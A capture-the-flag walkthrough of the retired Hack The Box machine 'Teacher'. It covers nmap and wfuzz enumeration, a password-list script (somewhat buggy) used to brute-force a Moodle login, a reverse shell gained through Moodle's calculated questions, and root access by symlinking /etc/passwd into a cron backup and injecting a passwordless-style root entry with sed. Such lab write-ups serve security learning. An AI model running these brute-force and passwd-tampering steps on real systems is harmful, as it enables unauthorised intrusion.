This post documents the complete walkthrough of Teacher, a retired vulnerable VM created by Gioo, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

Background

Teacher is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a nmap scan to establish the available services in the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 10.10.10.153
...
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool

nmap finds 80/tcp open. Let’s go with that.

Directory/File Enumeration

Based on my experience, it’s always good to run some kind of fuzzing when faced with a lack of hints. Let’s run wfuzz and SecList’s common.txt, and see what we can find.

# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20 --hc 404 http://10.10.10.153/FUZZ
********************************************************
* Wfuzz 2.3.1 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.153/FUZZ
Total requests: 4593

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000010:  C=403     11 L	      32 W	    291 Ch	  ".hta"
000011:  C=403     11 L	      32 W	    296 Ch	  ".htaccess"
000012:  C=403     11 L	      32 W	    296 Ch	  ".htpasswd"
001232:  C=301      9 L	      28 W	    310 Ch	  "css"
001735:  C=301      9 L	      28 W	    312 Ch	  "fonts"
002067:  C=301      9 L	      28 W	    313 Ch	  "images"
002094:  C=200    249 L	     747 W	   8028 Ch	  "index.html"
002218:  C=301      9 L	      28 W	    317 Ch	  "javascript"
002250:  C=301      9 L	      28 W	    309 Ch	  "js"
002497:  C=301      9 L	      28 W	    313 Ch	  "manual"
002627:  C=301      9 L	      28 W	    313 Ch	  "moodle"
002995:  C=403     11 L	      32 W	    297 Ch	  "phpmyadmin"
003597:  C=403     11 L	      32 W	    300 Ch	  "server-status"

Total time: 47.61103
Processed Requests: 4593
Filtered Requests: 4580
Requests/sec.: 96.46924

The site is running Moodle. Moodle is the world’s open source learning platform. Moodle has its fair share of SQLi and RCE vulnerabilities but would require authenticated access.

d31325ca.png

While I was hunting around for a credential, something caught my eye at the Teacher’s gallery page.

7f34d280.png

I got double F’s! Something funky is going on here…

0cf66884.png

5.png is not an image. It’s a text file.

51d6ef0b.png

Gotcha!

It’s easy to generate a password list for brute-forcing the Moodle login form. You can do it with Python like so.

import string

charset = string.ascii_letters + string.digits + string.punctuations

f = open('passwords.txt', 'w')
s = Th4C00lTheacha
t = ''

for c in charset:
  t += s + c + '\n'

f.write(t)
f.close()

Once the password list is generated, we can use wfuzz to brute-force it.

# wfuzz -w passwords.txt --hh 440 -t 20 -d "anchor=&username=giovanni&password=FUZZ" http://10.10.10.153/moodle/login/index.php
********************************************************
* Wfuzz 2.3.1 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.153/moodle/login/index.php
Total requests: 94

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000065:  C=303      6 L	      34 W	    454 Ch	  "Th4C00lTheacha#"

Total time: 17.72110
Processed Requests: 94
Filtered Requests: 93
Requests/sec.: 5.304409

The credential is (giovanni:Th4C00lTheacha#).

ca2fc9fc.png

Low-Privilege Shell

Following the instructions from this post, I was able to execute a reverse shell back to me.

First, create a calculated question like so.

4cd4b5a0.png

Create the formula like so.

ef16f0d5.png

Then execute remote commands on the host to run a reverse shell back to me using nc.

213a07a8.png

There you have it, a low-privilege shell.

400efef7.png

Let’s upgrade our shell with a pseudo-TTY using Python and then stty raw -echo; fg; reset.

Privilege Escalation

I’m aware that Moodle connects to a database backend to store all the good stuff. The database settings are in config.php at the Moodle directory.

30e91902.png

Let’s connect to the database.

b4d16fec.png

Cracking the MD5 hash is easy.

1dc2b446.png

This is the password to giovanni’s account. user.txt is in the home directory.

2a856c44.png

During enumeration of giovanni’s account, I noticed the pressence of work directory and /usr/bin/backup.sh referred to it.

dc87e44b.png

If I had to guess, I would say this is inside a cron job ran with root privileges since giovanni has no permissions to edit it.

But, look at the last line. It changes the permissions of any file to rwxrwxrwx. What if I put a symbolic link to /etc/passwd in it?

39075b90.png

Boom! Anyone can edit /etc/passwd. Let’s give ourselves root access.

$ sed -r '1h;x;2s/root:x/toor:to5bce5sr7eK6/' /etc/passwd > /tmp/passwd
$ cp /tmp/passwd /etc/passwd

7a326bec.png

With a root shell, getting root.txt is a breeze.

f6295439.png

:dancer: